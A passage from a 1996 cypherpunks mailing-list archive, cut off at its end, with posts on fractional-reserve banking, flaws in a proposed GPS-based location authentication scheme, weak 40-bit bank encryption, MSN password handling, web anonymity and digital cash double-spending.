"Vladimir Z. Nuri" writes:
> >Thomas Grant Edwards writes:
> >> Banks "invent" money on a daily basis.
> >
> >Really? Since when?
> 
> since we left standards that tie money to things physical with
> value.

That means, Mr. Detweiler, that the Fed invents money, which is true
enough. However, banks in general aren't so empowered.

This isn't cypherpunks material any longer so I'll much more happily
discuss it in private mail. I feel bad about discussing it this much
already...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Dierks <timd@consensus.com>
Date: Fri, 12 Apr 1996 13:08:06 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <v02140b02ad93486a7a04@[205.149.165.24]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:22 PM 4/10/96, Peter Trei wrote:
>>
>> Peter - didn't they say that the checking station is also listening
>> to the satellites?  That way they can tell that you are playing back
>> signals that you taped earlier because they won't match what the
>> satellites are broadcasting right now.
>>
>> I think your idea would work if you wanted to pretend to be at a point
>> which was _farther_ from each of the satellites than where you actually
>> are.  Then you could delay all of the signals.  But the only way to
>> be farther would be to be deep underground.  You might be able to pretend
>> to be at the center of the earth, but that is not very useful.
>>
>> Actually I suppose this only applies to those satellites which are shared
>> between you and the checkin station.  If you are far away then maybe you
>> only share one or two.  If you know which ones those are, you can lie to
>> your heart's content about other ones, and for the shared ones you can
>> again delay the signal and claim to be farther than you are.
>>
>> If their authenticated repeaters are used then you have to assume the
>> checking station has all the satellite signals and again the best you can
>> do is pretend to be a Mole Man.
>>
>> Hal
>
>Denning hasn't thought this through. Do the math.

While we may disagree with Ms. Denning on a number of political matters,
she's quite intelligent; I suspect the paper is well-founded.

>The diameter of the earth is 12,576 km
>The speed of light is about 3e5 km/sec

GPS receivers are line-of-sight only; only a small portion of the earth can
see the same satellites.

> [...]
>Therefore any site that can see the same set of satellites as the site it is
>trying to simulate can do so, buffering less than 50 ms of waveforms and
>pretending to be on the end of a slow link.

GPS works by measuring the differing distances to a number of satellites.
Thus, a crucial factor of GPS reception is not just the signals from
satellites, but the different times at which these signals were received.

It might be possible to seperately record the signals from several
different satellites, delay them each just the right amount of time, and
then recombine them to simulate being at another nearby location (within
several hundred miles). However, this might not be possible. Examine the
following quote from Denning's paper:

:The location signature is virtually impossible to forge at the
:required accuracy. This is because the GPS observations at any given time
:are essentially unpredictable to high precision due to subtle satellite
:orbit perturbations, which are unknowable in real-time, and intentional
:signal instabilities  (dithering) imposed by the U.S. Department of Defense
:selective availability (SA) security policy.

It's possible that the orbit perturbations may be enough to screw up an
attempt to forge a signal; the variations in signal timings won't provide
enough information to an attacker to be able to accurately replicate what
the signal would look like at another location. It remains to be seen
whether it is reliably possible for the secure host, at its location, to
distinguish between an accurate signature and an inaccurate but plausible
forged signature.

Selective Availability doesn't really seem to matter that much, especially
since it's going to be phased out. (There was an announcement on this last
week, but I can't find a reference right now).

 - Tim

Tim Dierks  --  timd@consensus.com  --  www.consensus.com
Head of Thing-u-ma-jig Engineering, Consensus Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 00:14:07 +0800
To: Jüri Kaljundi <jk@digit.ee>
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <Pine.GSO.3.92.960411160334.16119J-100000@happyman>
Message-ID: <Pine.SUN.3.91.960411171436.8886B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Apr 1996, =?ISO-8859-1?Q?J=FCri_Kaljundi?= wrote:

> On Wed, 10 Apr 1996, Tom Weinstein wrote:
> 
> > Sorry, I think I was hallucinating or something.  You're right, they
> > don't require 128-bit encryption and they only let you query your
> > balance.
> 
> Are there any banks besides SFNB then that use weak 40-bit encryption for
> anything more than balance queries or transaction history, and allow to
> make real transactions on-line?

http://www.eub.com

> 
> I know Merita in Finland allows bank transactions using 40-bit RC4, but
> they also use one-time passwords (every user gets a printed list with 40
> or so password pairs, each of which you can use just once).
> 
> Juri Kaljundi
> jk@digit.ee
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sat, 13 Apr 1996 22:45:58 +0800
To: perry@piermont.com
Subject: Re: Money supply is fake anyway
Message-ID: <199604112204.RAA22999@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


> > Banks "invent" money on a daily basis.
> 
> Really? Since when?
> 

That's something from college-level economics.  If a bank
has reserves in excess of their reserve requirement, they
can loan out the excess, several times, gambling that they
won't be made to provide all of that alleged money in a
more negotiable (outside of the bank system) form, like
cash.

As I understand it, that's where a lot of the 80s Savings & Loan
problems came from - too many people wanted their 'money'
in a more negotiable form too quickly, and they had
to fold.  (OTOH, it's been a long time since I took that
college-level economics course.)

dave


--- David Smith, Intellectual Terrorist
http://www.midwest.net/scribers/dsmith/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Apr 1996 12:36:59 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Digital Cash Escrow
Message-ID: <ad92e5ef110210042db1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:27 PM 4/11/96, Vladimir Z. Nuri wrote:

>give me a break!!! the future government attempts to squelch,
>suppress, restrict, prohibit, regulate, tax, spindle, and
>mutilate Digital Cash will make Clipper look as significant and
>threatening as a christmas tree ornament.

Larry, are you just _now_ realizing these implications? A few years ago you
were fairly dismissive of these effects, arguing mainly that "electrocrisy"
(electronic democracy?) would be the main effect, or at least the program
that Cypherpunks should push.

...
>as I wrote in an earlier essay, the possibilities of combining
>digital cash with stock market company shares suggest a radical
>new economy that would have the potential to topple a lot of
>very powerful existing interests, in the way that printing presses
>once toppled the Church.
>
>to borrow a bit of Chinese black humor, "we live in interesting times".
>we will be living in even more interesting times shortly.

Sure. I wrote essays along these lines as early as 1987, with the ideas
apparent to me even earlier. (Cf., for example, "The Crypto Anarchist
Manifesto," 1987.)

Glad you are finally tuned in to our channel.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stillson@ashd.com (Chris Stillson)
Date: Sun, 14 Apr 1996 00:30:06 +0800
To: Jeff Barber <stillson@ashd.com (Chris Stillson)
Subject: Re: WWW User authentication
Message-ID: <199604112221.RAA18588@bach.ashd.com>
MIME-Version: 1.0
Content-Type: text/plain



>> >Well, if you use SSL, it's useable by a "large number of browsers" since
>> >Netscape has such a large share of the browser market.  And then all of
>> >the things you're doing w.r.t. authentication are hidden, at least from
>> >casual eavesdroppers and others too if you use more than the 40-bit option.
>> >There's really no other choice to reach a large number of browsers.
>
>> Once again mister barber is being an idiot.  netscape is not a "large number
>> of browsers".
>
I have to apologize for this.  Me having a bad day is not a good reason to
call Jeff Barber an idiot.  My aplogies.



>>                He is right that ssl is probably a good way to go. (shttp would
>> be better :) )
>
>SHTTP might be better if it didn't have to be "useable by a large number
>of browsers" -- since Netscape doesn't support SHTTP.  (I'm sorry that you
>apparently find Netscape's success so frustrating, but it is a fact.)


Again, I probably went a little overboard.  I just get worried when any one
company has as much control over the technology (in this case net based
encryption) as netscape has.  That, and I used to work for one of their
competitors and I get tired of people telling me that netscape is the only
company out there.  

Sorry to be a jerk






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew K. Bressen" <bressen@hks.net>
Date: Sun, 14 Apr 1996 00:41:32 +0800
To: cypherpunks@toad.com
Subject: washington post notices archives
Message-ID: <199604112139.RAA11386@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Hi--

we here at HKS.net have today received a cease and desist
letter from the washington post regarding editorial copy 
of theirs that was evidently posted to c'punks and then
abosrbed into our c'punk archives. 

Once the archives are restored (RSN) we'll probably manually edit out
the messages from the archive. We're trying to get the post to give us
URLs for their copies of the content in question so that we can point
to their archives, but their legal dept wasn't sure whether or not
their archives were on the web.

The posts in question date back some time (archive volume 1);
I'm not too concerned about a recurrance (though it would make
an interesting attack), but thought it was interesting 
enough to warrent mention, since it seems likely that the
washington post was grepping the net looking for themselves.

I wonder if robot exclusion on our site would have prevented this? 

Although the legal staffer who sent the letter did come up with a URL
for the offending messages, she seemed unaware of the concepts of
"mailing list" and (semi-automated) archives according to the person
here who spoke to her.

- --andrew k bressen
  bressen@hks.net


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMW17+1u2h42ZEVfZAQFslQP/avVguGOK/hRz/1SmZtZpld79edoDyJnf
yeBkX7WdrfVt1/xSkOdD4xtVHf1FENfeFr50xnt2PPVb8g0E0DQqMv6Cz4ZNy5Su
bXzsmvK/zCvLKPn7gueeRjk3jQKohGRf7R9Y6rr6N6jNbCS4zZQQ/nwN7sWdhZA2
epRRPjbH52A=
=8d5T
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Sun, 14 Apr 1996 01:24:01 +0800
To: "'cypherpunks@toad.com>
Subject: Hack MSN anyone?
Message-ID: <01BB27CD.F1BB8D40@loki>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The names have been changed to protect the innocent...

I need say no more I'm sure.
- ----------
From: 	MSN Support JosephB
Sent: 	Sunday, April 07, 1996 4:05 PM
To: 	xxxxxxxxxx
Subject: 	RE: Connection, Member ID: xxxxxxxxxx, Country: United States (1), Locale: English (United States)

Yes, windows95 dialup networking uses compression to send the password when connecting.

Thanks for using the Microsoft Network

Joseph Beasley
msn Member Support


- ----------
From: 	xxxxxxxxxx
Sent: 	Friday, April 05, 1996 5:57 PM
To: 	MSN Member Communications
Subject: 	Connection, Member ID: xxxxxxxxxx, Country: United States (1), Locale: English (United States)

Ye[Ask Member Support]


MemberID=xxxxxxxxxx
Problem Description=	Microsoft being security conscious and all, I would hope that when I connect to MSN over the Internet, that my MSN client has the decency to ENCRYPT my password when it sends it over the net,  yes?  This is the first time I couldn't get through to a dial-up connection and had to access MSN using my ISP.  Having done so, I find it extrememly convenient, and would like to continue to do so.  Thanks.


xxxxxxxxxx
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMW18MRhOHC4UmUYJAQHxvAf+NXAoqm8RUIskjtODUE9MYA+0JRs6x8f9
SMD70zWDRpF7mSPB6QaJcWfnufK5VqynrQ6iHfoNO9rC2yRlmkV04Ce3QW2m1z6P
NVgAayVofN0Cjd1vITgdrB1XB9u3PnjXUggyTBLnAprTy79dCQsiTgen/2YujsaV
Tzx6Xt87CFS8GwQcKWj5VonTkFQVjOuQIa6GbcVwEFiqVaXp2tLf3RUHXBtJ8B0H
nC4wecTyra6CW2AAqFVXXmwVGeDh87caSy4Y3oFEQ8mxgZHFxOZLUeLo3MdaE+nx
33Yl2VdsjxTIlkog1R8d+6A1VDqpVqAJzcdjKnPLm8Sivm9wdGgsag==
=TSTX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sat, 13 Apr 1996 06:33:54 +0800
To: Blake Coverett <blake@bcdev.com>
Subject: RE: bits and bytes / CDA perverting net protocol
In-Reply-To: <01BB279B.115D6C50@bcdev.com>
Message-ID: <Pine.BSF.3.91.960411172854.13632A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> In a past life I worked on a Honeywell DPS8 box that had 
> 36 bit words and 9 bit bytes.
> -Blake (recalling the random evil flags that extra bit was used for)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Ooo! Ooo! Let's go back to the 9-bit bytes! The ninth bit could be the 
adult/minor flag!

Let's toss away all of our computers! Buy new equipment! Just to 
accomodate the CDA! 

The ninth bit would be perfect for this! Every single byte could be 
flagged as Adult or Minor!

Every byte with a value > 255 would be only available to adults. If you
use numbers > 255, then the 9th bit would be set, and we would know you're
an adult since minors can't count to 256! 

Small print:
The "9th bit adult/minor flag" is the intellectual property of Steve Reid.
Unauthorized users of the "9th bit adult/minor flag" will be prosecuted 
to the fullest extent of the law.

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| Alternate email: sreid@edmbbs.iceonline.com  sreid@sea-to-sky.net |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|             --- DISCLAIMER: JMHO, YMMV, IANAL. ---                |
=====================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 14 Apr 1996 02:13:03 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: (political) Privacy, Regulatory Arbitrage, Free Speech
In-Reply-To: <9604111802.AA23693@rpcp.mit.edu>
Message-ID: <Pine.SUN.3.91.960411174501.26610C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for the thoughtful comments. 

On Tue, 11 Apr 2000, Joseph M. Reagle Jr. wrote:

> I just read your paper and had a couple quick comments, I used to think that
> the Internet would be an ultimate promoter of liberal democratic values,
> however given recent events in asian countries (which you mention)
> particularly actions of China (which you didn't) I am not at all sure that
> this will be the case -- of course, one can't prove these things, but I tend
> to believe that China could actually clamp down on the freedom of speech
> with respect to the following:

I agree that the next draft should discuss China more.  I think China 
could probably clamp down very effectively.  I am not persuaded it could 
do so without giving up a very large share of the benefits of access.

> 
> "Like it or not, we live now in an age of completely free speech..." I think
> it would be very worthwhile to examine what is meant by "free speech." I
> don't think free speech means, if I want, I could say what I want and no one

alas, this is beyond the scope of this essay.  There's a huge literature 
on this in the law reviews, though.
[...]
> 
> So perhaps the Internet shall provide a mechanism for practical free speech
> (allowing some to speak their minds, and the others that get trapped will
> get crushed) but it shouldn't be considered a subsitute for political free
> speech (in which no one gets crushed). In the case of countries like China,

I agree.  It's not a substitute.  Just an enabler in places that don't 
choose to practice draconian access control.

> the hope is that the practical free speech will enable political free
> speech, but based on news reports I am seeing this is less likely than I
> used to think, and as you mention in the section  of "Mobility of Personal
> Data" the capability of this technology to abuse the citizens' and
> customers' rights are also increasing, but their isn't an open mailing list
> on which everyone can examine the conversation between the organizations
> which wish to accomplish this.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 12 Apr 1996 14:07:54 +0800
To: cypherpunks@toad.com
Subject: Re: Know Your Net.Enemies Project
In-Reply-To: <ad9291d00f0210046a1c@[205.199.118.202]>
Message-ID: <Pine.ULT.3.92.960411174357.24598D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Apr 1996, Timothy C. May wrote:

[Nothing I disagree with -- DAMN!]
>
> No apology needed. I just think it's a destructive, negative idea, one that
> I think could cast the Cypherpunks as a bunch of small-minded people.

Are you seriously trying to suggest that we're not? :-)

> A research page having detailed links to their positions _might_ be useful
> to those who will be facing them in court or in debates. You might ask
> Godwin, Barlow, etc. if this would be useful.
>
> But this is quite a different thing from an "Enemies List," which I rather
> doubt would be useful per se to Barlow, Godwin, and other civil liberties
> activists.

I concur. Lists of links sans unnecessary editorial commentary would be
useful; counter-propaganda is distasteful and counterproductive.

I hate to bring up those damn Nazis *yet again*, but hey, this is as an
example, not for their own sake. Compare the following approaches to "bad
ideas."

http://www.wiesenthal.com/watch/index.html
Does not provide any links. Just says "look out, they're out there." IMO
ineffective, begging too many questions.

http://www.web.apc.org/~ara/
"Let's make the 'bad guys' look good by comparison!"

http://www.almanac.bc.ca/other-sites/
Lists of links with minimal editorial comments. Pretty good IMO.

http://www.almanac.bc.ca/cgi-bin/ftp.pl
Voluminous primary documents, with no editorial comments. Excellent.

http://www.vir.com/Shalom/hatred.html
Has the effect of glorifying the opposition. A very popular site among the
Nazis. Sheesh.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 13 Apr 1996 05:55:45 +0800
To: perry@piermont.com
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <199604111740.NAA21264@jekyll.piermont.com>
Message-ID: <199604112313.TAA23689@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:
>Scott Brickner writes:
>> Anyway, you computer creates the IP packet, but then sends it to your
>> ISP's router.  That router *always* makes changes to the packet header
>> because it must decrement the time-to-live field and recompute the
>> header checksum.
>
>There is a trivial trick for making the decrement TTL/change checksum
>operation very fast, based on noting how a decrement would change the
>checksum. Most very high speed routers attempt to avoid doing ANY
>processing of the packets at all beyond this, and IPv6 has no header
>checksum partially in order to reduce this overhead further. Forcing
>routers to do more work is a Very Very Bad Idea.

As I pointed out in a private note to Perry, it's not the high-speed
routers that have to change the packets.  They typically are between
the sort of ISPs that would get "network common carrier" status, and
could rely on the options added (or not) by the other side.  It's only
when the packet crosses the border from outside the "common carrier"
net to inside that the header needs changed, and that's usually at a
terminal server, not a "very high speed router".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 14 Apr 1996 00:21:51 +0800
Subject: No Subject
Message-ID: <199604112221.SAA05470@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


e.

>     However, since the protocol requires that Alice send out location data,
>once
>she starts using it she reveals her physical location to Eve, Mallory, and
>anyone ese
> who can see the packets. Since the nature of the protocol is that Alice's
>location does 
>not  change frequently (and needs to transmitted  via a trusted channel to
>Bob when it
>does), after the first usage Mallory  *knows* the physical location  he is
>trying to 
>simulate, and can use this information for future spoofing.
>
>     The upshot of this is that Denning's scheme not only provides no
>security against 
>spoofing, and leaks potentially sensitive data about locations. 
>
>     If Sadaam Huissain (sp?) had used this scheme during the Gulf War, we'd
>have been 
>able to send a cruise missile directly to his keyboard.

This could be prevented by encrypting the data packets, but that would
introduce more delay into the protocol, and make it easier to spoof distant
locations.

>[These flaws in the protocol seem so obvious that I can't help but wonder if
>we're 
>missing something - Dorothy isn't *that* stupid.]

Isn't she about the age where Alzheimer's starts kicking in?

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 02:04:54 +0800
To: cypherpunks@toad.com
Subject: Re: Money supply is fake anyway
In-Reply-To: <199604112204.RAA22999@cdale1.midwest.net>
Message-ID: <199604112225.SAA22025@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I've answered Mr. Smith in private mail.

.pm


"David E. Smith" writes:
> > > Banks "invent" money on a daily basis.
> > 
> > Really? Since when?
> > 
> 
> That's something from college-level economics.  If a bank
> has reserves in excess of their reserve requirement, they




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 13 Apr 1996 02:55:13 +0800
To: pmacdorn@isrinc.com
Subject: Re: GPS-based authentication
Message-ID: <m0u7Y7v-00090jC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 AM 4/11/96 -6, Peter Trei wrote:
>Ms Denning, Mr. MacDoran
>
>I've read with interest your proposed GPS-based authentication 
>mechanism (it was posted to the cypherpunks mailing list). Can you
>confirm that you wrote this? Some people on the list think it may be
>a forgery.
>
>The participants of the list have noted some apparent vulnerabilities
>in the system, and I am curious as to how you address them. If you
>respond to me and give permission, I'll forward your response to the
>list.
>
>The problems are two-fold:
>
>1. The system is easily spoofed.
>2. It leaks sensitive location data.

It should occur to all of us that what you (and we) call "problems" are, to 
government sympathizers, actually FEATURES.  Identifying people's locations 
is probably going to be considered enormously important to the government 
(if it lasts that long).  And since the government runs all the GPS 
transmitters, and can presumably modulate the S/A function any way it 
wishes, it has a leg up on all of us who have to depend on the integrity of 
the system.  There is also the possibility of them jamming the system 
locally to either deny the user the ability to make the identification 
system work and thus deny access, or detect the location of the user by 
subtly modulating the local signal in such a way as to leak through the 
otherwise-secure system.  (If we trust it that far, which I don't.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Powers Glenn" <Q101NOW@st.vse.cz>
Date: Sat, 13 Apr 1996 00:15:07 +0800
To: cypherpunks@toad.com
Subject: Re: Scientologists may subpoena anonymous remailer records
Message-ID: <318256DC0@st.vse.cz>
MIME-Version: 1.0
Content-Type: text/plain


- > BTW, has anyone out there created an anonymous web forwarder? I'm sure 
- > there are a lot of people out there who don't like the idea of having 
- > their email address in the log files of dozens of web servers... Creating 
- > a simple web forwarder wouldn't be hard.
- 
- I've heard several people make this statement...  Can anyone confirm that
- it is really possible to log the uid (username) of the person making the
- http request?  I know they can get your ip address, but I'm skeptical
- of getting the username.

    Yes, there are several web interfaces to anonymous remailers out 
there (check altavista). No, they cannot get your username UNLESS you 
have logged into the site by entering a username and password into a 
www auth dialogue box -or- you are on a Unix box which is running 
identd -and- the remote site runs a check (unlikely and DOES NOT 
apply to dialups, unless you are running identd on your dialup).
    Even in the extremely unlikely event of a remailer running a 
check using identd, that would not show up in the standard web logs.
    It would be theorically possible to get a username/True Name
from an IP address if you were on a dialup and the ISP kept track of 
who was on what dialup and when. 
glenn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 00:44:09 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Know Your Net.Enemies Project
In-Reply-To: <olPI84q00YUuIE=vI9@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.91.960411193514.16784A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Apr 1996, Declan B. McCullagh wrote:

> Excerpts from cypherpunks: 11-Apr-96 Re: Know Your Net.Enemies P.. by
> Timothy C. May@got.net 
> > Sort of like Nixon's Enemies List?
> >  
> > Have we become the enemy?
> 
> Tim, I thought that the "Enemies List" name would be seen as a
> deliberate takeoff of Nixon's Enemies List, and what I thought would be
> a humorous working title for the project until a permanent one was
> found. You may remember, BTW, that I don't have the power of the FBI to
> command.
> 
> But since I was unclear and since the joke was ill-taken, I apologize.
> 
> To be clear: I envision this as opposition research. In the context of
> the CDA, it was very useful to know what the family values groups were
> saying -- their arguments and their strategies. A central collection
> point for such research is a useful thing.
> 
> Suggestions for a working title, anyone?

Re-education prospects list.

> 
> -Declan
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Powers Glenn" <Q101NOW@st.vse.cz>
Date: Fri, 12 Apr 1996 12:44:39 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <36B62659B@st.vse.cz>
MIME-Version: 1.0
Content-Type: text/plain


- It's called "S/A" (Selective Availability) which is the NWO term for adding 
- errors that "authorized" users can remove. (Not to be confused with A/S, or 
- anti-spoofing)   It was originally intended to be turned on in wartime to 
- deny the enemy accurate fixes, but during the Gulf War military GPS 
- receivers were so scarce that the soldiers had to use commercial products, 
- so the S/A actually was turned OFF then!
- 
- Since then, pressure has been building to turn off S/A, since its usefulness 
- is nearly zero.  Even so, the amplitude of S/A errors are only a little 
- larger than natural errors caused by satellite timing errors, atmospheric 
- propagation variations, etc.  The result is that DGPS is useful, which is 
- (more or less) a fixed antenna and GPS system which knows where it is, and 
- subtracts where it "seems" to be by GPS every second, and broadcasts the 
- resulting error data on some terrestrial system to receivers locally.  The 
- result is errors down to the 1-meter level and even lower.  That system 
- compensates for both natural errors and S/A, so the whole purpose of having 
- S/A is negated.  Eventually S/A will probably be turned off permanently, but 
- even then we'll want to continue to use DGPS systems.

    Close, but not quite:
S/A is an ADJUSTABLE variable, not on/off. it can reduce accuracy to 
10 meters or 100 meters or whatever. It's a DoD term, not NWO term.
    The "this is where you really are" percision location (forgot 
the designation off hand) is ENCRYPTED (yes, there is crypto 
revelance here...) in the data stream from the satellites. The 
difference S/A makes is on the order of magnitude, therefore not 
"useless." It should be pointed out that different regions of the 
earth can have different degrees of accuracy based on the S/A system.
    I doubt S/A will ever be turned off, but this is my opinion. I 
know Jim's opinion. Discussion of this point is pointless.
    DGPS transmission are made from a multiple single points, which 
(to the best of my knowledge) are not networked.
    glenn
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Childers <JC6452@FS2HOST.CCCCD.EDU>
Date: Fri, 12 Apr 1996 12:47:24 +0800
To: cypherpunks@toad.com
Subject: info
Message-ID: <96Apr11.191350cdt.8844@cricket.ccccd.edu>
MIME-Version: 1.0
Content-Type: text/plain



send info




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon)
Date: Sat, 13 Apr 1996 02:14:21 +0800
To: cypherpunks@toad.com
Subject: Re: Tense visions of future imperfect
Message-ID: <9604120159.AB17030@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>What the bank does is keep a list of all spent serial numbers,
not all
>issued ones (since it doesn't know those).  That way it can
detect double
>spending.

Correct me if I'm wrong: It means that the weakest point of the
digital
cash chain is the server.  If the server's database is tampered
with, or lost,
then, the double-spending can be done (in case of loss, if ever
the server is put
back online)  

Does that means that for all practical purposes, a server
should be run from a 
vault with security comparable to a big money repository?

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMW1dnsiycyXFit0NAQFpPQf6A/IvZWumneiGU1IERxbs/udunwFWHWVG
p+rbAK9h7bDYG+6NcFCIJp97n4MGfH8/+bbPLV4eIuv+5eyTKRkB+1IdOkVNUhEq
LGcKGN1iAScQvLxj+cM/3nthAhDxdaMBXmyaylnphgqh9slKJg7FppWpBfLI56nt
YYZJ69ThyYMVCN/g9o5G0zbzYefKFOzV/0lbxaGUn0G/KoKbURMut1NlMdfmhmqw
BbTd50ae8LVWLjxlVs5Gi5Ui9Loa2DKlSR5PIp1vlFDSk1UBAjTbbK8fSKVhkEFn
thI+YXLifA73LOJNdBWwvneTWyy+kdVxHBSDVFEXH2HMsR4LYeHF1g==
=JxPP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon)
Date: Sat, 13 Apr 1996 01:59:24 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Cash Escrow
Message-ID: <9604120200.AA17096@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: Cypherpunks@toad.com
from: jf_avon@citenet.net
date: 11 Avril 96
=======================================
John Deters <jad@dsddhc.com> wrote:

>ObOtherListComplaint (doesn't everyone?):  Has anyone suffered ill-effects
>by having their mail program filter Jim Bell's postings?

Does anyone, especially in Canada, ever noticed that them or their local net 
friends had their snail mail opened?

A friend of mine has his regularly opened; he complained to Canada Post
three times, but it stills goes on AFAIK.  He is pissed off at me, convinced
that the forwarding of Jim Bell's AP related articles is what justified the
mail opening.  Actually, he does not even reply to my e-mails anymore.  
We used to be great friends...


Neither of us ever engaged in any subversive activities or are involved in
illegal actions.

It seems that FUD got him.  ...sigh...

He even refused to *touch* PGP.  He is a professionnal programmer, in C++, win,

and OS-2.  Can you believe it?!?

Any comments?

JFA





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMW1pKsiycyXFit0NAQG3Rwf+PUFu0geKEXOEYktp5MP6ao4Yb0CfPSWA
dbnZ4R4kJsLm7jQ8tNXdo8KsLRhL7+Qe3NNfAKvTQVmvrN45QImyKk+fZd77Cady
TLKuNEYCx1FCrIpLewM13sLj4twCcNpvCIJNRsVV8Q3xcyWkfNJ6PSAakDa2POnD
spPnEz0Ptepw58KXoM0G36lE6fJnfv83PEeaogjE+h8Gsxf1uzhK1ZAQxpB6QHLP
4cizjFyKNfEZIVKK4kXebWr7wlalE87XTC6wWpXLQ8XuNYtbzKWG+wB747IpbN2a
ijKDBf9fXAZRB/qVQUdF/toEWJ/+Vg6LniFgmYq1EQqToUiPMRT48A==
=NnBW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
